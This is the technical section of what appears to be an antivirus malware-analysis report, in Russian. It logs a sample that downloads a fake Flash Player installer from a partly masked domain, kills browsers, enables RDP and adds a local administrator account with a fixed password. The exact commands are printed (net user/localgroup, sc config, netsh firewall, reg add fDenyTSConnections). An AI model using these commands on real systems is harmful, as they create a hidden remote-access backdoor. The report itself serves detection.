Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002' (тип запуска службы удалённых рабочих столов TermService переведён в «Автоматически»: значение 2 соответствует SERVICE_AUTO_START)
- '' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /im firefox.exe /f
- '<SYSTEM32>\taskkill.exe' /im iexplore.exe /f
- '<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable (в брандмауэре Windows разрешаются входящие подключения к удалённому рабочему столу)
- '<SYSTEM32>\taskkill.exe' /im chrome.exe /f
- iexplore.exe
- firefox.exe
- chrome.exe
- %TEMP%\flashplayer23axx_a_install.exe
- 'et###s.com.tw':80 (доменное имя частично скрыто в отчёте; подключение выполняется по порту 80, то есть по незащищённому HTTP)
- http://www.et###s.com.tw/tmp/adobe/update/flashplayer23axx_a_install.exe via et###s.com.tw (загрузка со стороннего домена; путь и имя файла имитируют установщик обновления Adobe Flash Player)
- DNS ASK www.et###s.com.tw
- ClassName: '' WindowName: ''
- '%TEMP%\flashplayer23axx_a_install.exe'
- '<SYSTEM32>\sc.exe' config termservice start= auto
- '<SYSTEM32>\sc.exe' start termservice
- '<SYSTEM32>\net1.exe' localgroup administrators SUPPORT_3863625 /add
- '<SYSTEM32>\net1.exe' user SUPPORT_3863625 !1ASDqweasdqwe /add (создание локальной учётной записи SUPPORT_3863625 с фиксированным паролем, заданным прямо в командной строке; имя учётной записи и пароль можно использовать как индикаторы компрометации)
- '<SYSTEM32>\net.exe' user SUPPORT_3863625 !1ASDqweasdqwe /add
- '<SYSTEM32>\net.exe' localgroup administrators SUPPORT_3863625 /add (созданная учётная запись добавляется в группу локальных администраторов; в сочетании с включённой службой TermService, разрешением в брандмауэре и fDenyTSConnections = 0 это даёт удалённый административный доступ по RDP)
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f (значение fDenyTSConnections = 0 снимает запрет на входящие подключения к удалённому рабочему столу)